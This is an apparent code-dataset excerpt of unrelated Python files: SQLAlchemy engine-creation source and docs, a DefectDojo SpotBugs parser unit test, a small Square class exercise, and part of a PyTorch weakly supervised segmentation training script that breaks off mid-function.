that indicates database dialect and connection arguments::
engine = create_engine("postgresql://scott:tiger@localhost/test")
.. note::
Please review :ref:`database_urls` for general guidelines in composing
URL strings. In particular, special characters, such as those often
part of passwords, must be URL encoded to be properly parsed.
Additional keyword arguments may then follow it which
establish various options on the resulting :class:`_engine.Engine`
and its underlying :class:`.Dialect` and :class:`_pool.Pool`
constructs::
engine = create_engine("mysql://scott:tiger@hostname/dbname",
encoding='latin1', echo=True)
The string form of the URL is
``dialect[+driver]://user:password@host/dbname[?key=value..]``, where
``dialect`` is a database name such as ``mysql``, ``oracle``,
``postgresql``, etc., and ``driver`` the name of a DBAPI, such as
``psycopg2``, ``pyodbc``, ``cx_oracle``, etc. Alternatively,
the URL can be an instance of :class:`~sqlalchemy.engine.url.URL`.
``**kwargs`` takes a wide variety of options which are routed
towards their appropriate components. Arguments may be specific to
the :class:`_engine.Engine`, the underlying :class:`.Dialect`,
as well as the
:class:`_pool.Pool`. Specific dialects also accept keyword arguments that
are unique to that dialect. Here, we describe the parameters
that are common to most :func:`_sa.create_engine()` usage.
Once established, the newly resulting :class:`_engine.Engine` will
request a connection from the underlying :class:`_pool.Pool` once
:meth:`_engine.Engine.connect` is called, or a method which depends on it
such as :meth:`_engine.Engine.execute` is invoked. The
:class:`_pool.Pool` in turn
will establish the first actual DBAPI connection when this request
is received. The :func:`_sa.create_engine` call itself does **not**
establish any actual DBAPI connections directly.
.. seealso::
:doc:`/core/engines`
:doc:`/dialects/index`
:ref:`connections_toplevel`
:param case_sensitive: if False, result column names
will match in a case-insensitive fashion, that is,
``row['SomeColumn']``.
:param connect_args: a dictionary of options which will be
passed directly to the DBAPI's ``connect()`` method as
additional keyword arguments. See the example
at :ref:`custom_dbapi_args`.
:param convert_unicode=False: if set to True, causes
all :class:`.String` datatypes to act as though the
:paramref:`.String.convert_unicode` flag has been set to ``True``,
regardless of a setting of ``False`` on an individual :class:`.String`
type. This has the effect of causing all :class:`.String` -based
columns to accommodate Python Unicode objects directly as though the
datatype were the :class:`.Unicode` type.
.. deprecated:: 1.3
The :paramref:`_sa.create_engine.convert_unicode` parameter
is deprecated and will be removed in a future release.
All modern DBAPIs now support Python Unicode directly and this
parameter is unnecessary.
:param creator: a callable which returns a DBAPI connection.
This creation function will be passed to the underlying
connection pool and will be used to create all new database
connections. Usage of this function causes connection
parameters specified in the URL argument to be bypassed.
This hook is not as flexible as the newer
:meth:`_events.DialectEvents.do_connect` hook which allows complete
control over how a connection is made to the database, given the full
set of URL arguments and state beforehand.
.. seealso::
:meth:`_events.DialectEvents.do_connect` - event hook that allows
full control over DBAPI connection mechanics.
:ref:`custom_dbapi_args`
:param echo=False: if True, the Engine will log all statements
as well as a ``repr()`` of their parameter lists to the default log
handler, which defaults to ``sys.stdout`` for output. If set to the
string ``"debug"``, result rows will be printed to the standard output
as well. The ``echo`` attribute of ``Engine`` can be modified at any
time to turn logging on and off; direct control of logging is also
available using the standard Python ``logging`` module.
.. seealso::
:ref:`dbengine_logging` - further detail on how to configure
logging.
:param echo_pool=False: if True, the connection pool will log
informational output such as when connections are invalidated
as well as when connections are recycled to the default log handler,
which defaults to ``sys.stdout`` for output. If set to the string
``"debug"``, the logging will include pool checkouts and checkins.
Direct control of logging is also available using the standard Python
``logging`` module.
.. seealso::
:ref:`dbengine_logging` - further detail on how to configure
logging.
:param empty_in_strategy: No longer used; SQLAlchemy now uses
"empty set" behavior for IN in all cases.
:param enable_from_linting: defaults to True. Will emit a warning
if a given SELECT statement is found to have un-linked FROM elements
which would cause a cartesian product.
.. versionadded:: 1.4
.. seealso::
:ref:`change_4737`
:param encoding: Defaults to ``utf-8``. This is the string
encoding used by SQLAlchemy for string encode/decode
operations which occur within SQLAlchemy, **outside of
the DBAPIs own encoding facilities.**
.. note:: The ``encoding`` parameter deals only with in-Python
encoding issues that were prevalent with many DBAPIs under Python
2. Under Python 3 it is mostly unused. For DBAPIs that require
client encoding configurations, such as those of MySQL and Oracle,
please consult specific :ref:`dialect documentation
<dialect_toplevel>` for details.
All modern DBAPIs that work in Python 3 necessarily feature direct
support for Python unicode strings. Under Python 2, this was not
always the case. For those scenarios where the DBAPI is detected as
not supporting a Python ``unicode`` object under Python 2, this
encoding is used to determine the source/destination encoding. It is
**not used** for those cases where the DBAPI handles unicode directly.
To properly configure a system to accommodate Python ``unicode``
objects, the DBAPI should be configured to handle unicode to the
greatest degree as is appropriate - see the notes on unicode pertaining
to the specific target database in use at :ref:`dialect_toplevel`.
Areas where string encoding may need to be accommodated
outside of the DBAPI, nearly always under **Python 2 only**,
include zero or more of:
* the values passed to bound parameters, corresponding to
the :class:`.Unicode` type or the :class:`.String` type
when ``convert_unicode`` is ``True``;
* the values returned in result set columns corresponding
to the :class:`.Unicode` type or the :class:`.String`
type when ``convert_unicode`` is ``True``;
* the string SQL statement passed to the DBAPI's
``cursor.execute()`` method;
* the string names of the keys in the bound parameter
dictionary passed to the DBAPI's ``cursor.execute()``
as well as ``cursor.setinputsizes()`` methods;
* the string column names retrieved from the DBAPI's
``cursor.description`` attribute.
When using Python 3, the DBAPI is required to support all of the above
values as Python ``unicode`` objects, which in Python 3 are just known
as ``str``. In Python 2, the DBAPI does not specify unicode behavior
at all, so SQLAlchemy must make decisions for each of the above values
on a per-DBAPI basis - implementations are completely inconsistent in
their behavior.
:param execution_options: Dictionary execution options which will
be applied to all connections. See
:meth:`~sqlalchemy.engine.Connection.execution_options`
:param future: Use the 2.0 style :class:`_future.Engine` and
:class:`_future.Connection` API.
.. versionadded:: 1.4
.. seealso::
:ref:`migration_20_toplevel`
:param hide_parameters: Boolean, when set to True, SQL statement parameters
will not be displayed in INFO logging nor will they be formatted into
the string representation of :class:`.StatementError` objects.
.. versionadded:: 1.3.8
.. seealso::
:ref:`dbengine_logging` - further detail on how to configure
logging.
:param implicit_returning=True: When ``True``, a RETURNING-
compatible construct, if available, will be used to
fetch newly generated primary key values when a single row
INSERT statement is emitted with no existing returning()
clause. This applies to those backends which support RETURNING
or a compatible construct, including PostgreSQL, Firebird, Oracle,
Microsoft SQL Server. Set this to ``False`` to disable
the automatic usage of RETURNING.
:param isolation_level: this string parameter is interpreted by various
dialects in order to affect the transaction isolation level of the
database connection. The parameter essentially accepts some subset of
these string arguments: ``"SERIALIZABLE"``, ``"REPEATABLE READ"``,
``"READ COMMITTED"``, ``"READ UNCOMMITTED"`` and ``"AUTOCOMMIT"``.
Behavior here varies per backend, and
individual dialects should be consulted directly.
Note that the isolation level can also be set on a
per-:class:`_engine.Connection` basis as well, using the
:paramref:`.Connection.execution_options.isolation_level`
feature.
.. seealso::
:attr:`_engine.Connection.default_isolation_level`
- view default level
:paramref:`.Connection.execution_options.isolation_level`
- set per :class:`_engine.Connection` isolation level
:ref:`SQLite Transaction Isolation <sqlite_isolation_level>`
:ref:`PostgreSQL Transaction Isolation <postgresql_isolation_level>`
:ref:`MySQL Transaction Isolation <mysql_isolation_level>`
:ref:`session_transaction_isolation` - for the ORM
:param json_deserializer: for dialects that support the
:class:`_types.JSON`
datatype, this is a Python callable that will convert a JSON string
to a Python object. By default, the Python ``json.loads`` function is
used.
.. versionchanged:: 1.3.7 The SQLite dialect renamed this from
``_json_deserializer``.
:param json_serializer: for dialects that support the :class:`_types.JSON`
datatype, this is a Python callable that will render a given object
as JSON. By default, the Python ``json.dumps`` function is used.
.. versionchanged:: 1.3.7 The SQLite dialect renamed this from
``_json_serializer``.
:param label_length=None: optional integer value which limits
the size of dynamically generated column labels to that many
characters. If less than 6, labels are generated as
"_(counter)". If ``None``, the value of
``dialect.max_identifier_length``, which may be affected via the
:paramref:`_sa.create_engine.max_identifier_length` parameter,
is used instead. The value of
:paramref:`_sa.create_engine.label_length`
may not be larger than that of
    :paramref:`_sa.create_engine.max_identifier_length`.
.. seealso::
:paramref:`_sa.create_engine.max_identifier_length`
:param listeners: A list of one or more
:class:`~sqlalchemy.interfaces.PoolListener` objects which will
receive connection pool events.
:param logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.engine" logger. Defaults to a hexstring of the
object's id.
.. seealso::
:ref:`dbengine_logging` - further detail on how to configure
logging.
:paramref:`_engine.Connection.execution_options.logging_token`
:param max_identifier_length: integer; override the max_identifier_length
determined by the dialect. if ``None`` or zero, has no effect. This
is the database's configured maximum number of characters that may be
used in a SQL identifier such as a table name, column name, or label
name. All dialects determine this value automatically, however in the
case of a new database version for which this value has changed but
SQLAlchemy's dialect has not been adjusted, the value may be passed
here.
.. versionadded:: 1.3.9
.. seealso::
:paramref:`_sa.create_engine.label_length`
:param max_overflow=10: the number of connections to allow in
connection pool "overflow", that is connections that can be
opened above and beyond the pool_size setting, which defaults
to five. this is only used with :class:`~sqlalchemy.pool.QueuePool`.
:param module=None: reference to a Python module object (the module
itself, not its string name). Specifies an alternate DBAPI module to
be used by the engine's dialect. Each sub-dialect references a
specific DBAPI which will be imported before first connect. This
parameter causes the import to be bypassed, and the given module to
be used instead. Can be used for testing of DBAPIs as well as to
inject "mock" DBAPI implementations into the :class:`_engine.Engine`.
:param paramstyle=None: The `paramstyle <http://legacy.python.org/dev/peps/pep-0249/#paramstyle>`_
to use when rendering bound parameters. This style defaults to the
one recommended by the DBAPI itself, which is retrieved from the
``.paramstyle`` attribute of the DBAPI. However, most DBAPIs accept
more than one paramstyle, and in particular it may be desirable
to change a "named" paramstyle into a "positional" one, or vice versa.
When this attribute is passed, it should be one of the values
``"qmark"``, ``"numeric"``, ``"named"``, ``"format"`` or
``"pyformat"``, and should correspond to a parameter style known
to be supported by the DBAPI in use.
:param pool=None: an already-constructed instance of
:class:`~sqlalchemy.pool.Pool`, such as a
:class:`~sqlalchemy.pool.QueuePool` instance. If non-None, this
pool will be used directly as the underlying connection pool
for the engine, bypassing whatever connection parameters are
present in the URL argument. For information on constructing
connection pools manually, see :ref:`pooling_toplevel`.
:param poolclass=None: a :class:`~sqlalchemy.pool.Pool`
subclass, which will be used to create a connection pool
instance using the connection parameters given in the URL. Note
this differs from ``pool`` in that you don't actually
instantiate the pool in this case, you just indicate what type
of pool to be used.
:param pool_logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.pool" logger. Defaults to a hexstring of the object's
id.
.. seealso::
:ref:`dbengine_logging` - further detail on how to configure
logging.
:param pool_pre_ping: boolean, if True will enable the connection pool
"pre-ping" feature that tests connections for liveness upon
each checkout.
.. versionadded:: 1.2
.. seealso::
:ref:`pool_disconnects_pessimistic`
:param pool_size=5: the number of connections to keep open
inside the connection pool. This used with
:class:`~sqlalchemy.pool.QueuePool` as
well as :class:`~sqlalchemy.pool.SingletonThreadPool`. With
:class:`~sqlalchemy.pool.QueuePool`, a ``pool_size`` setting
of 0 indicates no limit; to disable pooling, set ``poolclass`` to
:class:`~sqlalchemy.pool.NullPool` instead.
:param pool_recycle=-1: this setting causes the pool to recycle
connections after the given number of seconds has passed. It
defaults to -1, or no timeout. For example, setting to 3600
means connections will be recycled after one hour. Note that
MySQL in particular will disconnect automatically if no
activity is detected on a connection for eight hours (although
this is configurable with the MySQLDB connection itself and the
server configuration as well).
.. seealso::
:ref:`pool_setting_recycle`
:param pool_reset_on_return='rollback': set the
:paramref:`_pool.Pool.reset_on_return` parameter of the underlying
:class:`_pool.Pool` object, which can be set to the values
``"rollback"``, ``"commit"``, or ``None``.
.. seealso::
:paramref:`_pool.Pool.reset_on_return`
:param pool_timeout=30: number of seconds to wait before giving
up on getting a connection from the pool. This is only used
with :class:`~sqlalchemy.pool.QueuePool`. This can be a float but is
subject to the limitations of Python time functions which may not be
reliable in the tens of milliseconds.
.. note: don't use 30.0 above, it seems to break with the :param tag
:param pool_use_lifo=False: use LIFO (last-in-first-out) when retrieving
connections from :class:`.QueuePool` instead of FIFO
(first-in-first-out). Using LIFO, a server-side timeout scheme can
reduce the number of connections used during non- peak periods of
use. When planning for server-side timeouts, ensure that a recycle or
pre-ping strategy is in use to gracefully handle stale connections.
.. versionadded:: 1.3
.. seealso::
:ref:`pool_use_lifo`
:ref:`pool_disconnects`
:param plugins: string list of plugin names to load. See
:class:`.CreateEnginePlugin` for background.
.. versionadded:: 1.2.3
:param query_cache_size: size of the cache used to cache the SQL string
form of queries. Set to zero to disable caching.
The cache is pruned of its least recently used items when its size reaches
N * 1.5. Defaults to 500, meaning the cache will always store at least
500 SQL statements when filled, and will grow up to 750 items at which
point it is pruned back down to 500 by removing the 250 least recently
used items.
Caching is accomplished on a per-statement basis by generating a
cache key that represents the statement's structure, then generating
string SQL for the current dialect only if that key is not present
in the cache. All statements support caching, however some features
such as an INSERT with a large set of parameters will intentionally
bypass the cache. SQL logging will indicate statistics for each
    statement whether or not it was pulled from the cache.
.. note:: some ORM functions related to unit-of-work persistence as well
as some attribute loading strategies will make use of individual
per-mapper caches outside of the main cache.
.. seealso::
:ref:`sql_caching`
.. versionadded:: 1.4
""" # noqa
if "strategy" in kwargs:
strat = kwargs.pop("strategy")
if strat == "mock":
return create_mock_engine(url, **kwargs)
else:
raise exc.ArgumentError("unknown strategy: %r" % strat)
kwargs.pop("empty_in_strategy", None)
# create url.URL object
u = _url.make_url(url)
u, plugins, kwargs = u._instantiate_plugins(kwargs)
entrypoint = u._get_entrypoint()
dialect_cls = entrypoint.get_dialect_cls(u)
if kwargs.pop("_coerce_config", False):
def pop_kwarg(key, default=None):
value = kwargs.pop(key, default)
if key in dialect_cls.engine_config_types:
value = dialect_cls.engine_config_types[key](value)
return value
else:
pop_kwarg = kwargs.pop
dialect_args = {}
# consume dialect arguments from kwargs
for k in util.get_cls_kwargs(dialect_cls):
if k in kwargs:
dialect_args[k] = pop_kwarg(k)
dbapi = kwargs.pop("module", None)
if dbapi is None:
dbapi_args = {}
for k in util.get_func_kwargs(dialect_cls.dbapi):
if k in kwargs:
dbapi_args[k] = pop_kwarg(k)
dbapi = dialect_cls.dbapi(**dbapi_args)
dialect_args["dbapi"] = dbapi
dialect_args.setdefault("compiler_linting", compiler.NO_LINTING)
enable_from_linting = kwargs.pop("enable_from_linting", True)
if enable_from_linting:
dialect_args["compiler_linting"] ^= compiler.COLLECT_CARTESIAN_PRODUCTS
for plugin in plugins:
plugin.handle_dialect_kwargs(dialect_cls, dialect_args)
# create dialect
dialect = dialect_cls(**dialect_args)
# assemble connection arguments
(cargs, cparams) = dialect.create_connect_args(u)
cparams.update(pop_kwarg("connect_args", {}))
cargs = list(cargs) # allow mutability
# look for existing pool or create
pool = pop_kwarg("pool", None)
if pool is None:
def connect(connection_record=None):
if dialect._has_events:
for fn in dialect.dispatch.do_connect:
connection = fn(dialect, connection_record, cargs, cparams)
if connection is not None:
return connection
return dialect.connect(*cargs, **cparams)
creator = pop_kwarg("creator", connect)
poolclass = pop_kwarg("poolclass", None)
if poolclass is None:
poolclass = dialect.get_dialect_pool_class(u)
pool_args = {"dialect": dialect}
# consume pool arguments from kwargs, translating a few of
# the arguments
translate = {
"logging_name": "pool_logging_name",
"echo": "echo_pool",
"timeout": "pool_timeout",
"recycle": "pool_recycle",
"events": "pool_events",
"reset_on_return": "pool_reset_on_return",
"pre_ping": "pool_pre_ping",
"use_lifo": "pool_use_lifo",
}
for k in util.get_cls_kwargs(poolclass):
tk = translate.get(k, k)
if tk in kwargs:
pool_args[k] = pop_kwarg(tk)
for plugin in plugins:
plugin.handle_pool_kwargs(poolclass, pool_args)
pool = poolclass(creator, **pool_args)
else:
if isinstance(pool, poollib.dbapi_proxy._DBProxy):
pool = pool.get_pool(*cargs, **cparams)
pool._dialect = dialect
# create engine.
if pop_kwarg("future", False):
from sqlalchemy import future
default_engine_class = future.Engine
else:
default_engine_class = base.Engine
engineclass = kwargs.pop("_future_engine_class", default_engine_class)
engine_args = {}
for k in util.get_cls_kwargs(engineclass):
if k in kwargs:
engine_args[k] = pop_kwarg(k)
# internal flags used by the test suite for instrumenting / proxying
# engines with mocks etc.
_initialize = kwargs.pop("_initialize", True)
_wrap_do_on_connect = kwargs.pop("_wrap_do_on_connect", None)
# all kwargs should be consumed
if kwargs:
raise TypeError(
"Invalid argument(s) %s sent to create_engine(), "
"using configuration %s/%s/%s. Please check that the "
"keyword arguments are appropriate for this combination "
"of components."
% (
",".join("'%s'" % k for k in kwargs),
dialect.__class__.__name__,
pool.__class__.__name__,
engineclass.__name__,
)
)
engine = engineclass(pool, dialect, u, **engine_args)
if _initialize:
do_on_connect = dialect.on_connect_url(url)
if do_on_connect:
if _wrap_do_on_connect:
do_on_connect = _wrap_do_on_connect(do_on_connect)
def on_connect(dbapi_connection, connection_record):
do_on_connect(dbapi_connection)
event.listen(pool, "connect", on_connect)
def first_connect(dbapi_connection, connection_record):
c = base.Connection(
engine,
connection=dbapi_connection,
_has_events=False,
# reconnecting will be a reentrant condition, so if the
# connection goes away, Connection is then closed
_allow_revalidate=False,
)
c._execution_options = util.EMPTY_DICT
try:
dialect.initialize(c)
finally:
# note that "invalidated" and "closed" are mutually
# exclusive in 1.4 Connection.
if not c.invalidated and not c.closed:
# transaction is rolled back otherwise, tested by
# test/dialect/postgresql/test_dialect.py
# ::MiscBackendTest::test_initial_transaction_state
dialect.do_rollback(c.connection)
# previously, the "first_connect" event was used here, which was then
# scaled back if the "on_connect" handler were present. now,
# since "on_connect" is virtually always present, just use
# "connect" event with once_unless_exception in all cases so that
# the connection event flow is consistent in all cases.
event.listen(
pool, "connect", first_connect, _once_unless_exception=True
)
dialect_cls.engine_created(engine)
if entrypoint is not dialect_cls:
entrypoint.engine_created(engine)
for plugin in plugins:
plugin.engine_created(engine)
return engine
def engine_from_config(configuration, prefix="sqlalchemy.", **kwargs):
"""Create a new Engine instance using a configuration dictionary.
The dictionary is typically produced from a config file.
The keys of interest to ``engine_from_config()`` should be prefixed, e.g.
``sqlalchemy.url``, ``sqlalchemy.echo``, etc. The 'prefix' argument
indicates the prefix to be searched for. Each matching key (after the
prefix is stripped) is treated as though it were the corresponding keyword
argument to a :func:`_sa.create_engine` call.
The only required key is (assuming the default prefix) ``sqlalchemy.url``,
which provides the :ref:`database URL <database_urls>`.
A select set of keyword arguments will be "coerced" to their
expected type based on string values. The set of arguments
is extensible per-dialect using the ``engine_config_types`` accessor.
:param configuration: A dictionary (typically produced from a config file,
but this is not a requirement). Items whose keys start with the value
of 'prefix' will have that prefix stripped, and will then be passed to
:func:`_sa.create_engine`.
:param prefix: Prefix to match and then strip from keys
in 'configuration'.
:param kwargs: Each keyword argument to ``engine_from_config()`` itself
overrides the corresponding item taken from the 'configuration'
dictionary. Keyword arguments should *not* be prefixed.
"""
options = dict(
(key[len(prefix) :], configuration[key])
for key in configuration
if key.startswith(prefix)
)
options["_coerce_config"] = True
options.update(kwargs)
url = options.pop("url")
return create_engine(url, **options)
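# --- Hedged usage sketch (added for illustration; not part of the library) ---
# Shows the two entry points defined above. The URL, pool settings and the
# config dict values below are illustrative assumptions, not required values.
if __name__ == "__main__":
    # Direct construction: pool_recycle / echo are keyword arguments described
    # in the create_engine() docstring above.
    engine = create_engine("sqlite://", pool_recycle=3600, echo=False)

    # engine_from_config(): keys are prefix-stripped and string values such as
    # "false" / "3600" are coerced to their expected types, as described above.
    config = {
        "sqlalchemy.url": "sqlite://",
        "sqlalchemy.echo": "false",
        "sqlalchemy.pool_recycle": "3600",
    }
    engine_from_config(config, prefix="sqlalchemy.")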
|
py | b4033c35c56e5a7d39d6c13eb703677125c28a96 | from django.test import TestCase
from dojo.tools.spotbugs.parser import SpotbugsParser
from dojo.models import Test
class TestSpotbugsParser(TestCase):
def test_no_findings(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/no_finding.xml", Test())
self.assertEqual(0, len(findings))
def test_parse_many_finding(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
self.assertEqual(81, len(findings))
def test_find_sast_source_line(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
self.assertEqual(95, test_finding.sast_source_line)
def test_find_sast_source_path(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
self.assertEqual("securitytest/command/IdentityFunctionCommandInjection.kt", test_finding.sast_source_file_path)
def test_find_source_line(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
self.assertEqual(95, test_finding.line)
def test_find_file_path(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
self.assertEqual("securitytest/command/IdentityFunctionCommandInjection.kt", test_finding.file_path)
def test_description(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
# Test if line 13 is correct
self.assertEqual(
"At IdentityFunctionCommandInjection.kt:[lines 20-170]",
test_finding.description.splitlines()[12]
)
def test_mitigation(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
# Test if line 10 is correct
self.assertEqual(
"#### Example",
test_finding.mitigation.splitlines()[9]
)
def test_references(self):
parser = SpotbugsParser()
findings = parser.get_findings("dojo/unittests/scans/spotbugs/many_findings.xml", Test())
test_finding = findings[0]
# Test if line 2 is correct
self.assertEqual(
"[OWASP: Top 10 2013-A1-Injection](https://www.owasp.org/index.php/Top_10_2013-A1-Injection)",
test_finding.references.splitlines()[1]
)
|
py | b4033c915cb709007166e29d118e674fa4b16810 | #!/usr/bin/python3
"""Create and define the class "Square".
This module creates an class called "Square" that defines a square.
Typical usage example:
var = Square() or var = Square(arg)
"""
class Square:
"""Defines a Square.
Defines a square and its values subject to certain conditions.
Attributes:
__size: size of the square.
"""
def __init__(self, size=0):
"""Inits Square."""
self.__size = size
@property
def size(self):
"""Returns Square"""
return self.__size
@size.setter
def size(self, value):
"""Sets Square with a size subject to certain conditions."""
if type(value) is not int:
raise ValueError("size must be an integer")
if value < 0:
raise ValueError("size must be >= 0")
self.__size = value
def area(self):
"""Returns the current square area."""
return self.__size * self.__size
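# --- Hedged usage sketch (added for illustration only) ---
# Exercises the size property validation and area() defined above.
if __name__ == "__main__":
    sq = Square(3)
    print(sq.area())      # 9
    sq.size = 5           # setter re-validates the new value
    print(sq.area())      # 25
    try:
        sq.size = -1      # rejected by the setter
    except ValueError as err:
        print(err)        # size must be >= 0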
|
py | b4033c97ad8f3ea9bc04dbba4aecf204b7b4a0e1 | import argparse
from cmath import isnan
import datetime
import logging
import os
import random
import sys
sys.path.append(".")
import numpy as np
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.nn.functional as F
from datasets import voc5 as voc
from model.losses import MaskedDINOLoss, get_masked_cos_loss, get_seg_loss, DINOLoss
from model.model_aux_dino_roi import network
from omegaconf import OmegaConf
from torch.nn.parallel import DistributedDataParallel
from torch.utils.data import DataLoader
from torch.utils.data.distributed import DistributedSampler
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
from utils import evaluate, imutils, optimizer
from utils.camutils import cam_to_label, cam_to_label2, cam_to_roi_mask, cam_to_roi_mask2, multi_scale_cam2, label_to_aff_mask
from utils.pyutils import AverageMeter, cal_eta, format_tabs, setup_logger, get_mask_by_radius
parser = argparse.ArgumentParser()
parser.add_argument("--config", default='configs/voc.yaml', type=str, help="config")
parser.add_argument("--work_dir", default=None, type=str, help="work_dir")
parser.add_argument("--local_rank", default=-1, type=int, help="local_rank")
parser.add_argument("--crop_size", default=224, type=int, help="crop_size")
parser.add_argument('--backend', default='nccl')
def worker_init_fn(worker_id):
worker_seed = torch.initial_seed() % 2**32
np.random.seed(worker_seed)
random.seed(worker_seed)
def setup_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
def crop_from_roi(images, roi_mask=None, crop_num=8, crop_size=96):
crops = []
b, c, h, w = images.shape
# images[:,0, ][roi_mask==2] = 0
# images[:,1, ][roi_mask==2] = 0
# images[:,2, ][roi_mask==2] = 0
rand_h = torch.randint(h - crop_size, size=(b, crop_num))
rand_w = torch.randint(w - crop_size, size=(b, crop_num))
crops_flag = torch.ones(size=(b, crop_num + 2), dtype=torch.int16)
temp_crops = torch.zeros(size=(b, c, crop_size, crop_size)).to(images.device)
for i2 in range(crop_num):
for i1 in range(b):
h0, w0 = rand_h[i1, i2], rand_w[i1, i2]
temp_crops[i1,...] = images[i1, :, h0:(h0+crop_size), w0:(w0+crop_size)]
crops_flag[i1, i2] = roi_mask[i1, h0:(h0+crop_size), w0:(w0+crop_size)].max()
crops.append(temp_crops)
return crops, crops_flag
def validate(model=None, data_loader=None, cfg=None):
preds, gts, cams, tscams, cams_aux = [], [], [], [], []
model.eval()
avg_meter = AverageMeter()
with torch.no_grad():
for _, data in tqdm(enumerate(data_loader), total=len(data_loader), ncols=100, ascii=" >="):
name, inputs, labels, cls_label = data
inputs = inputs.cuda()
b, c, h, w = inputs.shape
inputs = F.interpolate(inputs, size=[cfg.dataset.crop_size, cfg.dataset.crop_size], mode='bilinear', align_corners=False)
labels = labels.cuda()
cls_label = cls_label.cuda()
cls, segs, _, _, _ = model(inputs,)
cls_pred = (cls>0).type(torch.int16)
_f1 = evaluate.multilabel_score(cls_label.cpu().numpy()[0], cls_pred.cpu().numpy()[0])
avg_meter.add({"cls_score": _f1})
resized_segs = F.interpolate(segs, size=labels.shape[1:], mode='bilinear', align_corners=False)
###
_cams, _tscam, _cams_aux = multi_scale_cam2(model, inputs, cfg.cam.scales)
resized_cam = F.interpolate(_cams, size=labels.shape[1:], mode='bilinear', align_corners=False)
cam_label = cam_to_label(resized_cam, cls_label, cfg=cfg)
resized_cam_aux = F.interpolate(_cams_aux, size=labels.shape[1:], mode='bilinear', align_corners=False)
cam_label_aux = cam_to_label(resized_cam_aux, cls_label, cfg=cfg)
resized_tscam = F.interpolate(_tscam, size=labels.shape[1:], mode='bilinear', align_corners=False)
tscam_label = cam_to_label2(resized_tscam, cls_label, bkg_score=0.15, delta=0.1)
preds += list(torch.argmax(resized_segs, dim=1).cpu().numpy().astype(np.int16))
cams += list(cam_label.cpu().numpy().astype(np.int16))
gts += list(labels.cpu().numpy().astype(np.int16))
cams_aux += list(cam_label_aux.cpu().numpy().astype(np.int16))
tscams += list(tscam_label.cpu().numpy().astype(np.int16))
valid_label = torch.nonzero(cls_label[0])[:, 0]
out_cam = torch.squeeze(resized_cam)[valid_label]
#np.save(os.path.join(cfg.work_dir.pred_dir, name[0]+'.npy'), {"keys":valid_label.cpu().numpy(), "cam":out_cam.cpu().numpy()})
cls_score = avg_meter.pop('cls_score')
seg_score = evaluate.scores(gts, preds)
cam_score = evaluate.scores(gts, cams)
cam_aux_score = evaluate.scores(gts, cams_aux)
tscam_score = evaluate.scores(gts, tscams)
model.train()
tab_results = format_tabs([cam_score, cam_aux_score, tscam_score, seg_score], name_list=["CAM", "aux_CAM", "TS-CAM", "Segs"], cat_list=voc.class_list)
return cls_score, tab_results
def train(cfg):
num_workers = 10
torch.cuda.set_device(args.local_rank)
dist.init_process_group(backend=args.backend, )
time0 = datetime.datetime.now()
time0 = time0.replace(microsecond=0)
train_dataset = voc.VOC12ClsDataset(
root_dir=cfg.dataset.root_dir,
name_list_dir=cfg.dataset.name_list_dir,
split=cfg.train.split,
stage='train',
aug=True,
resize_range=cfg.dataset.resize_range,
rescale_range=cfg.dataset.rescale_range,
crop_size=cfg.dataset.crop_size,
img_fliplr=True,
ignore_index=cfg.dataset.ignore_index,
num_classes=cfg.dataset.num_classes,
)
val_dataset = voc.VOC12SegDataset(
root_dir=cfg.dataset.root_dir,
name_list_dir=cfg.dataset.name_list_dir,
split=cfg.val.split,
stage='val',
aug=False,
ignore_index=cfg.dataset.ignore_index,
num_classes=cfg.dataset.num_classes,
)
train_sampler = DistributedSampler(train_dataset, shuffle=True)
train_loader = DataLoader(
train_dataset,
batch_size=cfg.train.samples_per_gpu,
#shuffle=True,
num_workers=num_workers,
pin_memory=False,
drop_last=True,
sampler=train_sampler,
prefetch_factor=4)
val_loader = DataLoader(val_dataset,
batch_size=1,
shuffle=False,
num_workers=num_workers,
pin_memory=False,
drop_last=False)
device = torch.device(args.local_rank)
model = network(
backbone=cfg.backbone.name,
num_classes=cfg.dataset.num_classes,
embedding_dim=256,
pretrained=cfg.backbone.pretrained,
pooling=cfg.backbone.pooling,
total_iters=cfg.train.cam_iters,
init_momentum=cfg.train.dino_momentum
)
param_groups = model.get_param_groups()
model.to(device)
if args.local_rank == 0:
writer = SummaryWriter(cfg.work_dir.tb_logger_dir)
optim = getattr(optimizer, cfg.optimizer.type)(
params=[
{
"params": param_groups[0],
"lr": cfg.optimizer.learning_rate,
"weight_decay": cfg.optimizer.weight_decay,
},
{
"params": param_groups[1],
"lr": cfg.optimizer.learning_rate,
"weight_decay": cfg.optimizer.weight_decay,
},
{
"params": param_groups[2],
"lr": cfg.optimizer.learning_rate * 10,
"weight_decay": cfg.optimizer.weight_decay,
},
{
"params": param_groups[3],
"lr": cfg.optimizer.learning_rate * 10,
"weight_decay": cfg.optimizer.weight_decay,
},
],
lr=cfg.optimizer.learning_rate,
weight_decay=cfg.optimizer.weight_decay,
betas=cfg.optimizer.betas,
warmup_iter=cfg.scheduler.warmup_iter,
max_iter=cfg.train.max_iters,
warmup_ratio=cfg.scheduler.warmup_ratio,
power=cfg.scheduler.power)
logging.info('\nOptimizer: \n%s' % optim)
model = DistributedDataParallel(model, device_ids=[args.local_rank], find_unused_parameters=True)
